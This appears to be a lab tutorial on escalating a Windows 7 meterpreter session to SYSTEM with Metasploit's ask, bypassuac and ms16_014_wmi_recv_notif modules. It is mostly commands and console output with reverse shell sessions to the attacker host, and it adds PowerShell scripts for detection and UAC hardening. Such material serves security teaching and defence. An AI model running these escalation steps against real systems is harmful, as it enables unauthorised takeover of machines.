In the previous article, running msf.exe on the Win7 machine gave Kali a session, but that session only had ordinary user privileges and could not do much more.
Privilege escalation
1. Raise the program's run level
2. UAC bypass
3. Escalate through a privilege-escalation vulnerability
Raise the program's run level
msf module > exploit/windows/local/ask
This triggers a UAC prompt, so higher privileges are obtained only if the user clicks Yes.
5 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
msf5 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > use exploit/windows/local/ask
msf5 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME QQ.exe no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 1 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
msf5 exploit(windows/local/ask) >
You can see that session 5 only has ordinary user privileges. Now use the ask module to escalate: it needs the session to escalate from and the name of the program that will be launched (and shown in the UAC prompt).
msf5 exploit(windows/local/ask) > set session 5
session => 5
msf5 exploit(windows/local/ask) > set filename execl.exe
filename => execl.exe
msf5 exploit(windows/local/ask) >
Once the ask module is configured, run exploit. Back on Win7 a UAC prompt for execl.exe pops up: if you click Yes, Kali gets a new session; if you click No, Kali gets a failure message.
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
Win7 screenshot:
When Win7 clicks No, Kali returns:
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ask) >
When Win7 clicks Yes, Kali gets a new session:
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 6 opened (192.168.159.149:4444 -> 192.168.159.145:49249) at 2020-07-10 15:30:43 +0800
meterpreter >
Use background to leave this meterpreter.
Use sessions to list the sessions.
Use sessions -i 6 to enter the newly obtained session.
Use getuid to check the session's privileges.
It is still an ordinary user.
Now run getsystem to obtain SYSTEM privileges.
Run getuid again to confirm.
msf5 exploit(windows/local/ask) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
6 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49249 (192.168.159.145)
msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
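The getsystem output above says SYSTEM was obtained via "technique 1 (Named Pipe Impersonation)": a short-lived service is registered whose only job is to connect to a named pipe, and the pipe server impersonates that SYSTEM client. Such a service registration leaves a System log entry (Event ID 7045, "A service was installed in the system"). The following hunting script is an added example for defenders, not part of the original post or of Metasploit; the Days parameter and the verdict text are this script's own, and the regex is a heuristic that will also catch psexec-style pipe services.

```powershell
# Added example (not from the original post): hunt the System event log for
# service installations (Event ID 7045) whose binary path points at a named
# pipe, the footprint left by getsystem "technique 1".
# -Days is this script's own parameter (lookback window).
param([int]$Days = 7)

$since  = (Get-Date).AddDays(-$Days)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } `
                       -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # 7045 carries ServiceName, ImagePath, ServiceType, StartType and AccountName
    # as EventData fields; pull them out of the event XML by name.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # A named-pipe impersonation service typically looks like
    #   cmd.exe /c echo <random> > \\.\pipe\<random>
    # The regex matches the literal string \\.\pipe\ anywhere in the binary path.
    if ($data['ImagePath'] -match '\\\\\.\\pipe\\') {
        [pscustomobject]@{
            Time        = $e.TimeCreated
            Computer    = $e.MachineName
            ServiceName = $data['ServiceName']
            ImagePath   = $data['ImagePath']
            Account     = $data['AccountName']
            StartType   = $data['StartType']
            Verdict     = 'service binary is a named-pipe client; review for getsystem/psexec-style impersonation'
        }
    }
}
```

Run it on the target host (or point Get-WinEvent at a forwarded-events collector with -ComputerName). A legitimate service almost never has a pipe path as its executable, so any hit is worth triage; because the service is deleted again within seconds, the 7045 record is often the only trace left on disk.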
UAC bypass
msf modules:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
Here the first module is used to bypass UAC and escalate.
msf5 > use exploit/windows/local/bypassuac
Use the bypassuac module.
msf5 exploit(windows/local/bypassuac) > set session 5
session => 5
Set the session to escalate from.
msf5 exploit(windows/local/bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 7 opened (192.168.159.149:4444 -> 192.168.159.145:49250) at 2020-07-10 16:00:14 +0800
A new session is obtained:
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Escalation succeeded.
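The bypassuac output above reports two preconditions: "UAC is set to Default" and "Part of Administrators group". Both are configuration, not bugs, so a defender can audit them directly. The script below is an added example for administrators, not part of the original post or of Metasploit; the registry value names are the documented Windows UAC policy settings, while the severity wording and the default values assumed for missing entries are this script's own. Get-LocalGroupMember needs PowerShell 5.1 or later; on Windows 7 use net localgroup Administrators instead.

```powershell
# Added example (not from the original post): audit the local UAC policy and
# local Administrators membership that the bypassuac module checks for.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Read one policy value; if it is absent Windows uses the built-in default,
# which is what we report instead of 0. Defaults assumed here: EnableLUA=1,
# ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1.
function Get-PolicyValue([string]$Name, [int]$Default) {
    $v = (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name
    if ($null -eq $v) { $Default } else { [int]$v }
}

$enableLua     = Get-PolicyValue 'EnableLUA' 1                   # 1 = UAC on
$adminPrompt   = Get-PolicyValue 'ConsentPromptBehaviorAdmin' 5  # 2 = Always notify, 5 = Default
$secureDesktop = Get-PolicyValue 'PromptOnSecureDesktop' 1       # 1 = prompt on the secure desktop

$findings = @()
if ($enableLua -ne 1) {
    $findings += 'UAC is disabled (EnableLUA != 1): every admin process runs fully elevated.'
}
elseif ($adminPrompt -eq 0) {
    $findings += 'ConsentPromptBehaviorAdmin = 0: administrators are elevated silently, no prompt at all.'
}
elseif ($adminPrompt -eq 5 -or $secureDesktop -ne 1) {
    # This is the "Default" level shown in the bypassuac output: signed Windows
    # binaries auto-elevate without a prompt, which is what the bypass rides on.
    $findings += "ConsentPromptBehaviorAdmin = $adminPrompt, PromptOnSecureDesktop = $secureDesktop: UAC is at the Default level; raise it to Always notify (2 / 1)."
}

# The module also requires the compromised user to be a local administrator.
# Listing the group shows which accounts would satisfy that check.
$admins = Get-LocalGroupMember -Group 'Administrators' | Select-Object -ExpandProperty Name

[pscustomobject]@{
    EnableLUA                  = $enableLua
    ConsentPromptBehaviorAdmin = $adminPrompt
    PromptOnSecureDesktop      = $secureDesktop
    LocalAdministrators        = ($admins -join ', ')
    Findings                   = if ($findings) { $findings -join ' ' } else { 'UAC is at Always notify; auto-elevation based bypasses do not apply.' }
}
```

The two fixes the audit points at are the ones that actually remove this class of escalation: set ConsentPromptBehaviorAdmin to 2 with PromptOnSecureDesktop 1 (Always notify), and keep day-to-day accounts out of the local Administrators group so that the session an attacker lands in has no admin token to unlock in the first place. Note that getsystem in the output above still needed the bypass first; with a non-admin user, both steps fail.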
Escalate through a privilege-escalation vulnerability
exploit/windows/local/ms14_058_track_popup_menu
and so on. Here we use
exploit/windows/local/ms16_014_wmi_recv_notif
As before, use info and show options to view the module's details; only a session needs to be set.
If the attack succeeds it directly returns a shell; use whoami to check its privileges.
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options
Module options (exploit/windows/local/ms16_014_wmi_recv_notif):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows 7 SP0/SP1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 8
session => 8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows win7-PC\win7 @ WIN7-PC 192.168.159.149:4444 -> 192.168.159.145:49251 (192.168.159.145)
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
[*] Started reverse TCP handler on 192.168.159.149:4444
[*] Launching notepad to host the exploit...
[+] Process 1820 launched.
[*] Reflectively injecting the exploit DLL into 1820...
[*] Injecting exploit into 1820...
[*] Exploit injected. Injecting payload into 1820...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 9 opened (192.168.159.149:4444 -> 192.168.159.145:49255) at 2020-07-10 16:29:00 +0800
C:\Users\win7\Desktop>whoami
whoami
nt authority\system
C:\Users\win7\Desktop>
Escalation succeeded.